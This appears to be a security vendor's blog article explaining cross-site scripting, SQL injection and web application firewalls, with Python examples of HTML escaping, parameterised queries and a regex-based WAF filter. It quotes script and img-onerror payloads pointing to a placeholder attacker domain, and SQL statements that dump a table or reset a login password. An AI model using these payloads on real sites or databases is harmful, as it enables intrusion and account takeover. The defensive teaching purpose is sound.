XSS, SQL injection, and WAF

John Baldock

XSS – Cross-site scripting

XSS is a common form of injection attack on public-facing web servers. Any web server can be vulnerable, and websites today are feature-rich, with multiple embedded databases, comment sections, and media, all of which widen the attack surface that cyber criminals can probe for a variety of reasons.

For example, a website that contains a simple comments section might be exploited by a malicious user entering:

<script src=http://mwuhahahaha.com/evil.js></script>

An attacker can even sneak in redirects within IMG tags:

<img src="http://mwuhahahahaha.com/so.evil" onerror=window.open("http://mwuhahahahaha.com","xss",'height=666,width=666');>

These are just two examples of simple XSS attacks, but there are hundreds of ways a hacker will try to exploit weaknesses in a system, probing and testing every potential weak spot until they find a way in.

Attacks like this can redirect users, deface websites, and steal information that was not intended for the end-user.
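The root cause of the two comment-section payloads above is untrusted text being written straight into the page's markup. The following Python snippet is an added example (it is not from the original article and is not activereach code) that renders a constructed list of comments, including the two payloads quoted above, first without and then with HTML output encoding, so you can see the script and img tags turned into harmless literal text:

```python
import html

# Constructed sample comments. The second and third entries are the two
# payloads quoted in the article; the first is an ordinary comment.
SAMPLE_COMMENTS = [
    "Great article, thanks!",
    "<script src=http://mwuhahahaha.com/evil.js></script>",
    '<img src="http://mwuhahahahaha.com/so.evil" onerror=window.open("http://mwuhahahahaha.com","xss",\'height=666,width=666\');>',
]

WRAP_OPEN = '<li class="comment">'
WRAP_CLOSE = "</li>"


def render_comment_unsafe(text):
    # Vulnerable pattern: the comment is concatenated directly into markup,
    # so any tag or event handler in it becomes part of the live page.
    return WRAP_OPEN + text + WRAP_CLOSE


def render_comment_safe(text):
    # Hardened pattern: encode the five HTML-significant characters
    # (& < > " ') so the browser displays them literally and never
    # parses them as tags or attributes.
    return WRAP_OPEN + html.escape(text, quote=True) + WRAP_CLOSE


def contains_raw_markup(rendered):
    # Crude check used only for the demonstration: is there an unencoded
    # angle bracket left inside the list item?
    body = rendered[len(WRAP_OPEN):-len(WRAP_CLOSE)]
    return "<" in body or ">" in body


def render_page(comments, safe=True):
    renderer = render_comment_safe if safe else render_comment_unsafe
    return "<ul>" + "".join(renderer(c) for c in comments) + "</ul>"


if __name__ == "__main__":
    for c in SAMPLE_COMMENTS:
        print("unsafe:", render_comment_unsafe(c))
        print("safe:  ", render_comment_safe(c))
```

Encoding must match the output context: `html.escape` is right for text placed in an HTML element body or a quoted attribute, but text inserted into a JavaScript block, a URL, or CSS needs that context's own encoding. A Content-Security-Policy header that disallows scripts from untrusted origins is a useful second layer, but it does not replace encoding.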

In 2018, British Airways suffered a data breach in which the personal information of 380,000 customers, including payment information, was exposed. The method? XSS. A few cleverly crafted lines of JavaScript, injected through their public-facing web server.

Cross-site scripting is the number one weakness exploited in web applications, and attacks of this type have actually been increasing, not decreasing.

In 2019, Fortnite suffered a data breach in which the private data of 200 million players was exposed. Again, the ever-popular XSS attack method was the primary vector for this breach.

SQL Injection

SQL databases are among the most widely used data stores, so naturally one of the most popular hacking techniques for stealing information and gaining access to a system involves SQL.

Consider a simple login form on a website that queries an SQL database: if it is possible for a web form to query a database and check for a user and password, is there the potential for a malicious SQL string to be sent to the same database to modify a user or list all users? Yes, of course! Any public-facing database could be at risk.

If a user could somehow send SQL commands such as:

SELECT * FROM Customers;
ALTER LOGIN userName WITH PASSWORD = 'evilpassword';

This would allow them to view database records that are meant to be private, or to change the password of an account such as the admin login.
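The reason a login form can end up running attacker-supplied statements like the two above is that the form's input is pasted into the SQL text, so the database parser sees it as SQL rather than as a value. The following Python snippet is an added example (not from the article and not activereach code) using an in-memory SQLite database with a constructed users table; it compares the vulnerable string-concatenation pattern with a parameterised query. A username containing a single quote is enough to show the difference: the concatenated version hands the quote to the SQL parser and fails, while the bound parameter is treated purely as data.

```python
import sqlite3


def make_db():
    # Constructed sample database; the rows are made up for this example.
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (username TEXT, password_hash TEXT, is_admin INTEGER)"
    )
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [
            ("alice", "hash-a", 0),
            ("O'Brien", "hash-o", 0),
            ("admin", "hash-admin", 1),
        ],
    )
    return conn


def lookup_unsafe(conn, username):
    # Vulnerable pattern: user input is concatenated into the SQL text, so
    # quote characters and keywords in the input reach the SQL parser. This
    # is the mistake that makes injecting statements like
    # "SELECT * FROM Customers;" possible.
    query = "SELECT username, is_admin FROM users WHERE username = '" + username + "'"
    return conn.execute(query).fetchall()


def lookup_safe(conn, username):
    # Hardened pattern: the username is bound as a parameter. The driver
    # never splices it into the statement text, so it can only ever be
    # compared as a value.
    query = "SELECT username, is_admin FROM users WHERE username = ?"
    return conn.execute(query, (username,)).fetchall()


def demo():
    # Run both lookups on a benign name and on a name containing a quote.
    conn = make_db()
    results = {
        "unsafe_benign": lookup_unsafe(conn, "alice"),
        "safe_benign": lookup_safe(conn, "alice"),
        "safe_quote": lookup_safe(conn, "O'Brien"),
    }
    try:
        results["unsafe_quote"] = lookup_unsafe(conn, "O'Brien")
    except sqlite3.OperationalError as exc:
        # The quote broke the statement: proof the input was parsed as SQL.
        results["unsafe_quote"] = "error: " + str(exc)
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "->", value)
```

The concatenated query works for well-behaved input, which is why this bug survives testing; it only misbehaves when the input contains SQL syntax. Parameterised queries (or an ORM that uses them) remove the problem at its source. Running the application's database account with the minimum privileges it needs, so that it cannot execute `ALTER LOGIN` at all, limits the damage if a vulnerable query is missed.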

And this is not unrealistic: massive companies such as Yahoo have suffered data breaches thanks to SQL injection attacks.

An SQL vulnerability scanner could be used to check the safety of your website if you have immediate concerns. But SQL injection attacks can be very sophisticated, so organizations should adopt a far more complete security solution than relying on a single scan.

SQLmap is an open-source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws.

Web application firewalls – WAF

A WAF inspects the HTTP traffic to and from a web application, and can filter, monitor, and block traffic if it is deemed a risk. A WAF can prevent SQL injection and XSS-style attacks because it can see when malicious code has been inserted into the requests (form fields, query strings, headers) that pass from a user to the server.

And that’s not the only way a WAF can protect your website. A cloud-based WAF solution sits between the user and the server, and can therefore filter by IP address. This means you can avoid traffic from certain geographical locations, or blacklist by reputation. Additionally, some WAF solutions have DDoS controls built in as well.

[Image: CyberThreat real-time map]

With XSS and SQL injection continually being a nuisance for web developers, and new methods to bypass controls constantly being found by attackers, it is essential that businesses take the problem very seriously and ensure they have protected themselves and their customers from data breaches and other forms of cyber risk.

A lot of attackers use automated tools and programs to scan for weaknesses. Our WAF solutions use hidden background challenges to ensure that visitors to your website are definitely human; this is just one method that can ward off unwanted traffic. As well as this, the application-layer commands that are seen from the visitor are inspected and blocked if they meet any criteria that deem the traffic unsafe.
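To make the two WAF mechanisms described above concrete (IP reputation filtering, and inspection of application-layer request content), here is an added Python example. It is not activereach's product logic or rule set; the blocklist, the rules and the sample requests are all constructed for the demonstration, and the IP addresses come from the documentation ranges. It decodes each request parameter before matching, because a filter that matches on the raw, still percent-encoded value misses trivially encoded copies of the same payload.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed reputation blocklist (203.0.113.0/24 is a documentation range).
BLOCKED_IPS = {"203.0.113.7"}

# Constructed inspection rules. Real WAF rule sets are far larger and are
# tuned per application; these are deliberately small.
RULES = [
    ("xss-tag", re.compile(r"<\s*(script|img|iframe)\b", re.I)),
    ("xss-handler", re.compile(r"\bon[a-z]+\s*=", re.I)),
    ("sqli-stacked", re.compile(r";\s*(select|alter|drop|insert|update|delete)\b", re.I)),
]


def normalize(value):
    # Decode percent-encoding twice so a double-encoded '<' (%253C) is seen,
    # then collapse whitespace so padding does not defeat the patterns.
    decoded = unquote(unquote(value))
    return " ".join(decoded.split())


def inspect_request(src_ip, method, target, body=""):
    # Returns (decision, rule_id, field). Reputation is checked first, then
    # every query-string and form-body field is normalised and matched.
    if src_ip in BLOCKED_IPS:
        return ("block", "ip-reputation", None)
    parts = urlsplit(target)
    fields = parse_qsl(parts.query, keep_blank_values=True)
    if body:
        fields += parse_qsl(body, keep_blank_values=True)
    for name, value in fields:
        text = normalize(value)
        for rule_id, pattern in RULES:
            if pattern.search(text):
                return ("block", rule_id, name)
    return ("allow", None, None)


# Constructed sample traffic: (source IP, method, target[, body]). The second
# and third carry the payloads quoted earlier in the article, URL-encoded as
# a browser would send them.
SAMPLE_REQUESTS = [
    ("198.51.100.4", "GET", "/search?q=firewall+pricing"),
    ("198.51.100.4", "POST", "/comment",
     "text=%3Cscript+src%3Dhttp%3A%2F%2Fmwuhahahaha.com%2Fevil.js%3E%3C%2Fscript%3E"),
    ("198.51.100.4", "GET", "/user?name=x%3B+SELECT+*+FROM+Customers%3B"),
    ("203.0.113.7", "GET", "/"),
]


def run_samples():
    return [inspect_request(*req) for req in SAMPLE_REQUESTS]


if __name__ == "__main__":
    for req, verdict in zip(SAMPLE_REQUESTS, run_samples()):
        print(req[0], req[1], req[2], "->", verdict)
```

Two caveats worth keeping in mind when reading the output. Pattern rules are approximate: `xss-handler` would also block a harmless field called `one=`, which is why production WAFs ship with tuning and logging rather than silent blocking. And a WAF is a perimeter control; it reduces the traffic that reaches the application, but the output encoding and parameterised queries discussed earlier are what actually remove the vulnerability.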

activereach are specialists in WAF, DDoS Mitigation and Breach Detection solutions so give us a call on 0845 625 9025 or contact us to find out more.